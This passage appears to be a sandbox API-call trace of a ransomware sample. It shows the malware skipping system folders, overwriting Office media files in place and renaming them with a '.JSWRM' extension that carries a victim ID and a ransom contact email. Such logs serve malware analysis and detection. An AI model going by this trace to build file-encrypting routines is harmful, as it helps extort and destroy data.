office\\root\\office16\\media\\lync_dtmf8.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.146] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9696) returned 1 [0135.146] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.146] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x25e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x25e0, lpOverlapped=0x0) returned 1 [0135.148] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.148] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x25e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x25e0, lpOverlapped=0x0) returned 1 [0135.149] CloseHandle (hObject=0x238) returned 1 [0135.149] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf8.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf8.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf8.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf8.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.150] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b06103b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b06103b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0ad4d6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x258a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_dtmf9.wav", cAlternateFileName="LY9A51~1.WAV")) returned 1 [0135.150] lstrcmpiW (lpString1="LYNC_dtmf9.wav", lpString2=".") returned 1 [0135.150] lstrcmpiW (lpString1="LYNC_dtmf9.wav", lpString2="..") returned 1 [0135.150] lstrcmpiW (lpString1="LYNC_dtmf9.wav", lpString2="...") returned 1 [0135.150] lstrcmpiW (lpString1="LYNC_dtmf9.wav", lpString2="windows") returned -1 [0135.150] lstrcmpiW (lpString1="LYNC_dtmf9.wav", lpString2="recovery") returned -1 [0135.150] lstrcmpiW (lpString1="LYNC_dtmf9.wav", lpString2="perflogs") returned -1 [0135.150] lstrcmpiW (lpString1="LYNC_dtmf9.wav", lpString2="documents and settings") returned 1 [0135.150] lstrcmpiW (lpString1="LYNC_dtmf9.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.150] lstrcmpiW (lpString1="LYNC_dtmf9.wav", lpString2="system volume information") returned -1 [0135.150] lstrcmpiW (lpString1="LYNC_dtmf9.wav", lpString2="msocache") returned -1 [0135.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf9.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf9.wav", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf9.wav", lpUsedDefaultChar=0x0) returned 14 [0135.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf9.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf9.wav", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf9.wav", lpUsedDefaultChar=0x0) returned 14 [0135.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf9.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf9.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.151] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9610) returned 1 [0135.151] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.151] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2580, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2580, lpOverlapped=0x0) returned 1 [0135.153] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.153] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2580, lpOverlapped=0x0) returned 1 [0135.153] CloseHandle (hObject=0x238) returned 1 [0135.153] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf9.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf9.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf9.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf9.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.154] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b06103b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b06103b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b06103b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x25a2, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_dtmfpound.wav", cAlternateFileName="LY0309~1.WAV")) returned 1 [0135.154] lstrcmpiW (lpString1="LYNC_dtmfpound.wav", lpString2=".") returned 1 [0135.154] lstrcmpiW (lpString1="LYNC_dtmfpound.wav", lpString2="..") returned 1 [0135.154] lstrcmpiW (lpString1="LYNC_dtmfpound.wav", lpString2="...") returned 1 [0135.154] lstrcmpiW (lpString1="LYNC_dtmfpound.wav", lpString2="windows") returned -1 [0135.155] lstrcmpiW (lpString1="LYNC_dtmfpound.wav", lpString2="recovery") returned -1 [0135.155] lstrcmpiW (lpString1="LYNC_dtmfpound.wav", lpString2="perflogs") returned -1 [0135.155] lstrcmpiW (lpString1="LYNC_dtmfpound.wav", lpString2="documents and settings") returned 1 [0135.155] lstrcmpiW (lpString1="LYNC_dtmfpound.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.155] lstrcmpiW (lpString1="LYNC_dtmfpound.wav", lpString2="system volume information") returned -1 [0135.155] lstrcmpiW (lpString1="LYNC_dtmfpound.wav", lpString2="msocache") returned -1 [0135.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmfpound.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmfpound.wav", cchWideChar=18, lpMultiByteStr=0x2410d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmfpound.wav", lpUsedDefaultChar=0x0) returned 18 [0135.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmfpound.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmfpound.wav", cchWideChar=18, lpMultiByteStr=0x2411c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmfpound.wav", lpUsedDefaultChar=0x0) returned 18 [0135.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmfpound.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmfpound.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.156] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9634) returned 1 [0135.156] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.156] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x25a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x25a0, lpOverlapped=0x0) returned 1 [0135.158] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.158] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x25a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x25a0, lpOverlapped=0x0) returned 1 [0135.159] CloseHandle (hObject=0x238) returned 1 [0135.159] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmfpound.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmfpound.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmfpound.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmfpound.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.160] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b06103b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b06103b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b06103b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x25cc, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_dtmfstar.wav", cAlternateFileName="LYF790~1.WAV")) returned 1 [0135.160] lstrcmpiW (lpString1="LYNC_dtmfstar.wav", lpString2=".") returned 1 [0135.160] lstrcmpiW (lpString1="LYNC_dtmfstar.wav", lpString2="..") returned 1 [0135.160] lstrcmpiW (lpString1="LYNC_dtmfstar.wav", lpString2="...") returned 1 [0135.160] lstrcmpiW (lpString1="LYNC_dtmfstar.wav", lpString2="windows") returned -1 [0135.160] lstrcmpiW (lpString1="LYNC_dtmfstar.wav", lpString2="recovery") returned -1 [0135.160] lstrcmpiW (lpString1="LYNC_dtmfstar.wav", lpString2="perflogs") returned -1 [0135.160] lstrcmpiW (lpString1="LYNC_dtmfstar.wav", lpString2="documents and settings") returned 1 [0135.160] lstrcmpiW (lpString1="LYNC_dtmfstar.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.160] lstrcmpiW (lpString1="LYNC_dtmfstar.wav", lpString2="system volume information") returned -1 [0135.160] lstrcmpiW (lpString1="LYNC_dtmfstar.wav", lpString2="msocache") returned -1 [0135.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmfstar.wav", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0135.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmfstar.wav", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmfstar.wav", lpUsedDefaultChar=0x0) returned 17 [0135.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmfstar.wav", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0135.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmfstar.wav", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmfstar.wav", lpUsedDefaultChar=0x0) returned 17 [0135.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.160] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmfstar.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmfstar.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.161] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9676) returned 1 [0135.161] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.161] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x25c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x25c0, lpOverlapped=0x0) returned 1 [0135.164] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.164] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x25c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x25c0, lpOverlapped=0x0) returned 1 [0135.164] CloseHandle (hObject=0x238) returned 1 [0135.164] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmfstar.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmfstar.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmfstar.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmfstar.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.165] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b03add6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b03add6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b06103b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19c6c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_fastbusy.wav", cAlternateFileName="LYNC_F~1.WAV")) returned 1 [0135.165] lstrcmpiW (lpString1="LYNC_fastbusy.wav", lpString2=".") returned 1 [0135.165] lstrcmpiW (lpString1="LYNC_fastbusy.wav", lpString2="..") returned 1 [0135.165] lstrcmpiW (lpString1="LYNC_fastbusy.wav", lpString2="...") returned 1 [0135.165] lstrcmpiW (lpString1="LYNC_fastbusy.wav", lpString2="windows") returned -1 [0135.165] lstrcmpiW (lpString1="LYNC_fastbusy.wav", lpString2="recovery") returned -1 [0135.165] lstrcmpiW (lpString1="LYNC_fastbusy.wav", lpString2="perflogs") returned -1 [0135.165] lstrcmpiW (lpString1="LYNC_fastbusy.wav", lpString2="documents and settings") returned 1 [0135.165] lstrcmpiW (lpString1="LYNC_fastbusy.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.165] lstrcmpiW (lpString1="LYNC_fastbusy.wav", lpString2="system volume information") returned -1 [0135.165] lstrcmpiW (lpString1="LYNC_fastbusy.wav", lpString2="msocache") returned -1 [0135.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_fastbusy.wav", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0135.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_fastbusy.wav", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_fastbusy.wav", lpUsedDefaultChar=0x0) returned 17 [0135.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_fastbusy.wav", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0135.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_fastbusy.wav", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_fastbusy.wav", lpUsedDefaultChar=0x0) returned 17 [0135.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.166] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_fastbusy.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_fastbusy.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.166] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=105580) returned 1 [0135.166] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.166] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x19c60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x19c60, lpOverlapped=0x0) returned 1 [0135.175] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.175] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x19c60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x19c60, lpOverlapped=0x0) returned 1 [0135.175] CloseHandle (hObject=0x238) returned 1 [0135.175] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_fastbusy.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_fastbusy.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_fastbusy.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_fastbusy.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.176] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b03add6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b03add6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b06103b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xafcac, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_fsringing.wav", cAlternateFileName="LYNC_F~2.WAV")) returned 1 [0135.176] lstrcmpiW (lpString1="LYNC_fsringing.wav", lpString2=".") returned 1 [0135.176] lstrcmpiW (lpString1="LYNC_fsringing.wav", lpString2="..") returned 1 [0135.176] lstrcmpiW (lpString1="LYNC_fsringing.wav", lpString2="...") returned 1 [0135.176] lstrcmpiW (lpString1="LYNC_fsringing.wav", lpString2="windows") returned -1 [0135.176] lstrcmpiW (lpString1="LYNC_fsringing.wav", lpString2="recovery") returned -1 [0135.176] lstrcmpiW (lpString1="LYNC_fsringing.wav", lpString2="perflogs") returned -1 [0135.176] lstrcmpiW (lpString1="LYNC_fsringing.wav", lpString2="documents and settings") returned 1 [0135.176] lstrcmpiW (lpString1="LYNC_fsringing.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.176] lstrcmpiW (lpString1="LYNC_fsringing.wav", lpString2="system volume information") returned -1 [0135.176] lstrcmpiW (lpString1="LYNC_fsringing.wav", lpString2="msocache") returned -1 [0135.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_fsringing.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_fsringing.wav", cchWideChar=18, lpMultiByteStr=0x2412e0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_fsringing.wav", lpUsedDefaultChar=0x0) returned 18 [0135.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_fsringing.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_fsringing.wav", cchWideChar=18, lpMultiByteStr=0x241268, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_fsringing.wav", lpUsedDefaultChar=0x0) returned 18 [0135.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_fsringing.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_fsringing.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.177] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=720044) returned 1 [0135.177] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.178] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.196] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.196] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.197] CloseHandle (hObject=0x238) returned 1 [0135.197] MoveFileW 